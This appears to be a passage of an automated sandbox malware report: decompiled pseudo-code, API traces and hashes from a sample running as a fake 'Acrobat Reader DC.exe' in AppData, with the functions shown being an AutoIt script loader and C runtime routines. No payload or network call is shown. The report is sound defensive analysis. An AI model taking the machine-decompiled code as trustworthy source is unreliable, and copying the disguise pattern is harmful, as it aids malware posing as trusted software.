                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				intOrPtr _v72;
                                  				char* _v84;
                                  				intOrPtr _v92;
                                  				struct tagOFNA _v96;
                                  				void* __ebx;
                                  				void* __edi;
                                  				int _t18;
                                  				void* _t24;
                                  				char* _t28;
                                  				short* _t33;
                                  				void* _t34;
                                  				void* _t38;
                                  
                                  				_t38 = __fp0;
                                  				_t34 = __esi;
                                  				_t33 = __eax;
                                  				 *((char*)(__esi + 3)) =  *0x4974e8;
                                  				_t37 =  *__eax;
                                  				if( *__eax == 0) {
                                  					_t31 =  &_v96;
                                  					 *_t28 = 1;
                                  					E00412F40( &_v96, 0, 0x58);
                                  					_v96 = 0x58;
                                  					_v48 = L"Run Script:";
                                  					_v92 = 0;
                                  					_v68 = _t33;
                                  					_v64 = 0x104;
                                  					_v84 = L"AutoIt script files (*.au3, *.a3x)";
                                  					_v72 = 1;
                                  					_v44 = 0x1804;
                                  					_v36 = L"au3";
                                  					_t18 = GetOpenFileNameW( &_v96);
                                  					__eflags = _t18;
                                  					if(_t18 != 0) {
                                  						goto L1;
                                  					}
                                  					return 0;
                                  				}
                                  				L1:
                                  				E00410120(_t33, _t33, _t31);
                                  				E004102B0(_t33, _t33, _t34); // executed
                                  				_t24 = E0040F570(_t33, _a4, _t33, _t37, _t38, _t34, E00410190(_t34, _t33, _t33), _a4); // executed
                                  				return _t24;
                                  			}





















                                  APIs
                                  • _memset.LIBCMT ref: 004295D4
                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen_memset
                                  • String ID: X$pWH
                                  • API String ID: 2873425188-941433119
                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E0040F570(void* __eax, void* __ecx, void* __edx, void* __eflags, signed int __fp0, intOrPtr _a4, void* _a8, signed int _a12) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				short _v26;
                                  				short _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				char _v48;
                                  				signed int _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				char _v64;
                                  				char _v80;
                                  				char _v96;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t97;
                                  				signed int* _t99;
                                  				signed int* _t108;
                                  				signed int* _t119;
                                  				signed int* _t120;
                                  				signed int* _t122;
                                  				intOrPtr _t129;
                                  				void* _t130;
                                  				signed int _t131;
                                  				signed int _t142;
                                  				signed int* _t146;
                                  				signed int _t157;
                                  				signed int _t159;
                                  				void* _t160;
                                  				signed int _t162;
                                  				signed int _t164;
                                  				signed int _t170;
                                  				signed int _t174;
                                  				signed int _t178;
                                  				signed int _t179;
                                  				signed int _t181;
                                  				void* _t184;
                                  				intOrPtr _t195;
                                  				intOrPtr _t202;
                                  				signed int _t203;
                                  				void* _t209;
                                  				signed int _t212;
                                  				signed int _t215;
                                  				void* _t217;
                                  				void* _t218;
                                  
                                  				_t224 = __fp0;
                                  				_t184 = __edx;
                                  				_t209 = __eax;
                                  				_t97 = E0040F760(__ecx,  &_v48, __eflags, __eax); // executed
                                  				if(_t97 == 0) {
                                  					_t164 =  &_v48;
                                  					_t99 = E004528BD(__eflags, _t164, L">>>AUTOIT SCRIPT<<<",  &_a8,  &_a12); // executed
                                  					__eflags = _t99;
                                  					if(__eflags == 0) {
                                  						_t101 =  *_a8;
                                  						_t202 = _a4;
                                  						_t14 = _t101 + 1; // 0x2
                                  						_t210 = _t14;
                                  						 *((intOrPtr*)(_t202 + 0x10)) =  *_a8;
                                  						_v28 = _t164 | 0xffffffff;
                                  						_t157 = 0;
                                  						_a12 = 4;
                                  						_v64 = 0x485a84;
                                  						_v60 = 0;
                                  						_v56 = 0;
                                  						_v52 = 0;
                                  						_t170 = ( ~(0 | __eflags > 0x00000000) | _t210 * 0x00000010) + 4;
                                  						_push( ~(0 | __eflags > 0x00000000) | _t170);
                                  						_t108 = E004115D7(_t202, _t210, __eflags);
                                  						_t218 = _t217 + 4;
                                  						__eflags = _t108;
                                  						if(_t108 != 0) {
                                  							_t30 =  &(_t108[1]); // 0x4
                                  							_t170 = _t30;
                                  							 *_t108 = _t210;
                                  							_v24 = _t170;
                                  							E00410CA0(_t210, 0x4023e8, _t170, 0x10);
                                  							_t157 = _v24;
                                  						}
                                  						_t171 = _t170 | 0xffffffff;
                                  						 *((intOrPtr*)(_t202 + 0x44)) = _t157;
                                  						_v26 = _t170 | 0xffffffff;
                                  						__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 1;
                                  						if( *((intOrPtr*)(_t202 + 0x10)) < 1) {
                                  							L29:
                                  							E00413748(_a8); // executed
                                  							E00431E58( &_v48); // executed
                                  							E0040EDC0( &_v64, _t202, _t210);
                                  							E0044B469(__eflags,  &_v36);
                                  							return 1;
                                  						}
                                  						_v20 = 1;
                                  						_v24 = 0x10;
                                  						do {
                                  							E0040D530( &_v64, _t171);
                                  							goto L12;
                                  							do {
                                  								while(1) {
                                  									L12:
                                  									_t174 = _a12;
                                  									_t159 =  *(_t174 + _a8) & 0x000000ff;
                                  									_t203 = _t159;
                                  									_a12 = _t174 + 1;
                                  									E00402710(_t203,  &_v36, _t224);
                                  									_t119 = E0043259D( &_v36);
                                  									__eflags = _t119;
                                  									if(_t119 != 0) {
                                  										break;
                                  									}
                                  									_t171 =  &_v36;
                                  									_t120 = E0043257B( &_v36);
                                  									__eflags = _t120;
                                  									if(_t120 == 0) {
                                  										_t122 = E00432559( &_v36);
                                  										__eflags = _t122;
                                  										if(_t122 == 0) {
                                  											__eflags = E004325BE( &_v36);
                                  											if(__eflags == 0) {
                                  												goto L27;
                                  											}
                                  											_t171 =  &_a12;
                                  											_v16 = _t159;
                                  											_t130 = E00444AF8(__eflags, _a8,  &_a12); // executed
                                  											_t160 = _t130;
                                  											_t131 = _t203;
                                  											__eflags = _t131 - 0x31;
                                  											if(__eflags != 0) {
                                  												__eflags = _t131 - 0x30;
                                  												if(__eflags != 0) {
                                  													_push(_t160);
                                  													__eflags = _t131 - 0x37;
                                  													if(__eflags != 0) {
                                  														_push( &_v36); // executed
                                  														E0044B41C( &_a12, _t203,  &_v36, __eflags); // executed
                                  														L26:
                                  														_push(_t160);
                                  														E004111DC();
                                  														_t159 = _v16;
                                  														_t218 = _t218 + 4;
                                  														goto L27;
                                  													}
                                  													_push(_a4);
                                  													E0044C7DD( &_a12, _t203);
                                  													_push(_t160);
                                  													E004111DC();
                                  													_t218 = _t218 + 4;
                                  													continue;
                                  												}
                                  												E00401B10(_t160,  &_v96, __eflags);
                                  												_v12 = E00444A7E(__eflags,  &_v96);
                                  												E00402250( &_v96);
                                  												E00402710(0,  &_v36, _t224);
                                  												_t171 = _v12;
                                  												_v36 = _v12;
                                  												goto L26;
                                  											}
                                  											_t215 =  &_v80;
                                  											E00401B10(_t160, _t215, __eflags);
                                  											_t142 = E00444ABD(_a4, _t215);
                                  											_t171 = _t215;
                                  											_v12 = _t142;
                                  											E00402250(_t215);
                                  											E00402710(1,  &_v36, _t224);
                                  											_v36 = _v12;
                                  											goto L26;
                                  										}
                                  										_t178 = _a12;
                                  										_t195 = _a8;
                                  										_t224 =  *(_t178 + _t195);
                                  										_t171 = _t178 + 8;
                                  										_v36 =  *(_t178 + _t195);
                                  										_a12 = _t178 + 8;
                                  										goto L27;
                                  									}
                                  									_t179 = _a12;
                                  									_t146 = _t179 + _a8;
                                  									_a12 = _t179 + 8;
                                  									_t171 =  *_t146;
                                  									_v36 =  *_t146;
                                  									_v32 = _t146[1];
                                  									goto L27;
                                  								}
                                  								_t181 = _a12;
                                  								_t171 = _t181 + 4;
                                  								_a12 = _t181 + 4;
                                  								_v36 =  *(_t181 + _a8);
                                  								L27:
                                  								E00402780( &_v36, _t171,  &_v64);
                                  								__eflags = _t159 - 0x7f;
                                  							} while (_t159 != 0x7f);
                                  							_t212 = _v24;
                                  							_t202 = _a4;
                                  							E004022D0( *((intOrPtr*)(_t202 + 0x44)) + _t212,  &_v64); // executed
                                  							_t129 = _v20 + 1;
                                  							_t210 = _t212 + 0x10;
                                  							_v20 = _t129;
                                  							_v24 = _t212 + 0x10;
                                  							__eflags = _t129 -  *((intOrPtr*)(_t202 + 0x10));
                                  						} while (_t129 <=  *((intOrPtr*)(_t202 + 0x10)));
                                  						goto L29;
                                  					}
                                  					E00431E58( &_v48);
                                  					L6:
                                  					E00434034( *((intOrPtr*)(_a4 + 0x48)),  *(_a4 + 3) & 0x000000ff);
                                  					return 0;
                                  				}
                                  				_t162 = _a12;
                                  				if( *_t162 == 4) {
                                  					goto L6;
                                  				}
                                  				 *_t162 = 2;
                                  				return E004033C0(_t184, __fp0, _a4, _t209, _a8, _t209, 0x484ea8, 0);
                                  			}

                                  APIs
                                  • _free.LIBCMT ref: 004295A0
                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_wcscat_wcscpy
                                  • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 2744521063-368524663
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00401B10(void* __edi, intOrPtr* __esi, void* __eflags) {
                                  				intOrPtr _t14;
                                  				intOrPtr _t15;
                                  				signed int _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr* _t20;
                                  				void* _t34;
                                  				intOrPtr* _t35;
                                  				signed int _t41;
                                  
                                  				_t35 = __esi;
                                  				_t34 = __edi;
                                  				_t14 = E004111C1(__edi);
                                  				 *((intOrPtr*)(__esi + 4)) = _t14;
                                  				_t15 = _t14 + 1;
                                  				 *((intOrPtr*)(__esi + 8)) = _t15;
                                  				if(_t15 == 0) {
                                  					_t16 = 8;
                                  				} else {
                                  					_t16 = (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3);
                                  					_t41 = _t16;
                                  				}
                                  				 *(_t35 + 8) = _t16;
                                  				_push( ~(0 | _t41 > 0x00000000) | _t16 * 0x00000002); // executed
                                  				_t18 = E004115D7(_t34, _t35, _t41); // executed
                                  				 *_t35 = _t18;
                                  				E00410E60(_t18, _t34,  *((intOrPtr*)(_t35 + 4)) +  *((intOrPtr*)(_t35 + 4)) + 2);
                                  				_push(4); // executed
                                  				_t20 = E004115D7(_t34, _t35, _t41); // executed
                                  				if(_t20 == 0) {
                                  					_t20 = 0;
                                  				} else {
                                  					 *_t20 = 1;
                                  				}
                                  				 *((intOrPtr*)(_t35 + 0xc)) = _t20;
                                  				return _t35;
                                  			}

                                  APIs
                                  • _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00401B57
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                  • String ID: @EXITCODE
                                  • API String ID: 2734553683-3436989551
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00410100(void* __eax, void* __ecx, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v24;
                                  				void* __edi;
                                  				void* _t9;
                                  				void* _t11;
                                  
                                  				_t9 = E0040F760(__ecx,  &_v24, __eflags, __eax); // executed
                                  				if(_t9 == 0) {
                                  					_t11 = E004528BD(__eflags,  &_v24, L">>>AUTOIT NO CMDEXECUTE<<<",  &_v8,  &_v12); // executed
                                  					__eflags = _t11;
                                  					if(_t11 == 0) {
                                  						E00413748(_v8);
                                  						E00431E58( &_v24);
                                  						return 1;
                                  					} else {
                                  						E00431E58( &_v24); // executed
                                  						goto L1;
                                  					}
                                  				} else {
                                  					L1:
                                  					return 0;
                                  				}
                                  			}

                                  Strings
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 00410107
                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 0-1618683850
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043213D(void* __edx, void* __eflags, intOrPtr _a4) {
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t5;
                                  				intOrPtr _t6;
                                  				intOrPtr _t7;
                                  				intOrPtr _t11;
                                  				void* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr _t15;
                                  
                                  				_t12 = __edx;
                                  				_t15 = _a4;
                                  				_t5 = E004135BB(__edx, _t13, _t15, 0x20000); // executed
                                  				_t14 = _t5;
                                  				 *((intOrPtr*)(_t15 + 0x438)) = _t14;
                                  				_t6 = E004135BB(__edx, _t14, _t15, 0x10000); // executed
                                  				_t11 = _t6;
                                  				 *((intOrPtr*)(_t15 + 0x45c)) = _t11;
                                  				_t7 = E004135BB(_t12, _t14, _t15, 0x10000); // executed
                                  				 *((intOrPtr*)(_t15 + 0x458)) = _t7;
                                  				if(_t14 == 0 || _t11 == 0 || _t7 == 0) {
                                  					E004320F8(_t15);
                                  					return 5;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • _malloc.LIBCMT ref: 0043214B
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _malloc.LIBCMT ref: 0043215D
                                  • _malloc.LIBCMT ref: 0043216F
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc$AllocateHeap
                                  • String ID:
                                  • API String ID: 680241177-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D6B0(void* __fp0, char _a4, short* _a12) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v20;
                                  				int _v24;
                                  				intOrPtr _v28;
                                  				char _v36;
                                  				int _v40;
                                  				char _v48;
                                  				struct HINSTANCE__* _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t21;
                                  				intOrPtr _t22;
                                  				void* _t24;
                                  				intOrPtr _t27;
                                  				struct HINSTANCE__* _t32;
                                  				intOrPtr _t42;
                                  				intOrPtr _t48;
                                  				void* _t63;
                                  
                                  				_t63 = __fp0;
                                  				_t21 =  *0x4a9604; // 0xa52e98
                                  				if( *((intOrPtr*)(_t21 + 0x1d)) == 0) {
                                  					_t22 = 1;
                                  				} else {
                                  					_t41 = _a4;
                                  					 *0x497520 = _a4;
                                  					 *0x4974f4 = 0;
                                  					 *0x4974f0 = 0;
                                  					_v36 = 0;
                                  					_v28 = 1;
                                  					_v24 = 0;
                                  					_v20 = 0;
                                  					_v12 = 1;
                                  					_v8 = 0;
                                  					E00408F40(1,  &_v36);
                                  					_t43 =  &_v20;
                                  					_v28 = 6;
                                  					_v36 =  &_v20;
                                  					_v48 = 0;
                                  					_v40 = 0;
                                  					 *0x49751c = 0;
                                  					_t24 = E0040EBB0( &_v48);
                                  					_t61 = _t24;
                                  					if(_t24 != 0) {
                                  						 *0x49751c =  *((intOrPtr*)(E0040EC00( &_v48, _t61)))();
                                  					}
                                  					E00411951(0, _t43, 1, 0x4370c3);
                                  					E004119B0(1);
                                  					_t27 =  *0x4a9608; // 0xa52f00
                                  					E0040F4E0(_t41, _t27);
                                  					E0040D590(_a12, _t41, _t61, _t63);
                                  					_t42 =  *0x4a9608; // 0xa52f00
                                  					SystemParametersInfoW(0x2001, 0,  *(_t42 + 4), 2);
                                  					_t32 = _v52;
                                  					_t48 =  *0x4974f4;
                                  					if(_t32 != 0) {
                                  						FreeLibrary(_t32);
                                  					}
                                  					E00408F40(_t48,  &_v20);
                                  					E00408F40(_t48,  &_v36);
                                  					_t22 = _t48;
                                  				}
                                  				return _t22;
                                  			}

                                  APIs
                                  • SystemParametersInfoW.USER32 ref: 0040D779
                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FreeInfoLibraryParametersSystem
                                  • String ID:
                                  • API String ID: 3403648963-0
                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00414C76(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _t19;
                                  				intOrPtr _t22;
                                  				void* _t33;
                                  
                                  				_push(0xc);
                                  				_push(0x48d048);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                                  				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                                  					L6:
                                  					_t19 = 0;
                                  				} else {
                                  					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                                  						E00415471( *((intOrPtr*)(_t33 + 0x18)));
                                  						 *((intOrPtr*)(_t33 - 4)) = 0;
                                  						_t22 = E00414ABA( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                                  						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                                  						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                                  						E00414CFA();
                                  						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                                  					} else {
                                  						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                                  						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                                  							E00412F40( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                                  						}
                                  						 *((intOrPtr*)(E00417F77(_t41))) = 0x16;
                                  						E00417F25();
                                  						goto L6;
                                  					}
                                  				}
                                  				return E00416CB5(_t19);
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __lock_file_memset
                                  • String ID:
                                  • API String ID: 26237723-0
                                  • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                  • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00414A46(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t20;
                                  				signed int _t22;
                                  				intOrPtr _t32;
                                  				void* _t33;
                                  				intOrPtr _t35;
                                  
                                  				_push(0xc);
                                  				_push(0x48d028);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
                                  				_t32 =  *((intOrPtr*)(_t33 + 8));
                                  				_t35 = _t32;
                                  				_t36 = _t35 != 0;
                                  				if(_t35 != 0) {
                                  					__eflags =  *(_t32 + 0xc) & 0x00000040;
                                  					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
                                  						E00415471(_t32);
                                  						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
                                  						_t20 = E004149D9(__ebx, __edx, _t32); // executed
                                  						 *(_t33 - 0x1c) = _t20;
                                  						 *(_t33 - 4) = 0xfffffffe;
                                  						E00414AB2(_t32);
                                  					} else {
                                  						_t9 = _t32 + 0xc;
                                  						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
                                  						__eflags =  *_t9;
                                  					}
                                  					_t22 =  *(_t33 - 0x1c);
                                  				} else {
                                  					 *((intOrPtr*)(E00417F77(_t36))) = 0x16;
                                  					_t22 = E00417F25() | 0xffffffff;
                                  				}
                                  				return E00416CB5(_t22);
                                  			}

                                  APIs
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  • __lock_file.LIBCMT ref: 00414A8D
                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                  • String ID:
                                  • API String ID: 2800547568-0
                                  • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                  • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00414FE2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t15;
                                  				signed int _t17;
                                  				void* _t27;
                                  				intOrPtr _t29;
                                  
                                  				_push(0xc);
                                  				_push(0x48d068);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				_t29 =  *((intOrPtr*)(_t27 + 8));
                                  				_t30 = _t29 != 0;
                                  				if(_t29 != 0) {
                                  					E00415471( *((intOrPtr*)(_t27 + 8)));
                                  					_t5 = _t27 - 4;
                                  					 *_t5 =  *(_t27 - 4) & 0x00000000;
                                  					__eflags =  *_t5;
                                  					_t15 = E00414E4E(__edx,  *((intOrPtr*)(_t27 + 8))); // executed
                                  					 *(_t27 - 0x1c) = _t15;
                                  					 *(_t27 - 4) = 0xfffffffe;
                                  					E0041503D();
                                  					_t17 =  *(_t27 - 0x1c);
                                  				} else {
                                  					 *((intOrPtr*)(E00417F77(_t30))) = 0x16;
                                  					_t17 = E00417F25() | 0xffffffff;
                                  				}
                                  				return E00416CB5(_t17);
                                  			}

                                  APIs
                                  • __lock_file.LIBCMT ref: 00415012
                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                  • String ID:
                                  • API String ID: 2999321469-0
                                  • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                  • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00411682(int _a4) {
                                  
                                  				E00411657(_a4);
                                  				ExitProcess(_a4);
                                  			}

                                  APIs
                                  • ___crtCorExitProcess.LIBCMT ref: 0041168A
                                    • Part of subcall function 00411657: GetModuleHandleW.KERNEL32(mscoree.dll,?,0041168F,004115F6,?,0041823B,000000FF,0000001E,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D), ref: 00411661
                                    • Part of subcall function 00411657: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411671
                                  • ExitProcess.KERNEL32 ref: 00411693
                                  Memory Dump Source
